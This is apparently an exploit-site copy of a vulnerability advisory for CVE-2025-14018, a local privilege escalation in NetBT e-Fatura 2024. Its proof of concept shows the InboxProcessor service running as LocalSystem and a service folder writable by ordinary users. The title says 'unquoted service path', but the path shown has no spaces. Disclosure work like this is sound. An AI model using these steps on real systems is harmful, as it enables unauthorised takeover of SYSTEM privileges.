Exploit for 📄 NetBT e-Fatura 2024 Unquoted Service Path CVE-2025-14018

## https://sploitus.com/exploit?id=PACKETSTORM:218685
# Exploit Title: NetBT e-Fatura - Privilege Escalation
    # Author: Seccops
    # Discovery Date: 2025-10-03
    # Vendor: https://net-bt.com.tr/e-fatura/
    # Tested Version: 2024
    # Tested on OS: Microsoft Windows Server 2019 DC
    # Vulnerability Type: CWE-428 Unquoted Search Path or Element
    # CVE: CVE-2025-14018
    
    Note: Thanks "Levent Sungu" for providing the testing environment.
    
    ====================
    Description & Impact
    ====================
    This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system.
    
    ================
    Proof of Concept
    ================
    
    C:\Users\efatura>sc qc InboxProcessor
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: InboxProcessor
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : InboxProcessor
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\"
    
    Accesschk v6.15 - Reports effective permissions for securable objects
    Copyright (C) 2006-2022 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    C:\inetpub\wwwroot\InboxProcessor
      RW BUILTIN\Users
      RW NT SERVICE\TrustedInstaller
      RW NT AUTHORITY\SYSTEM
      RW BUILTIN\Administrators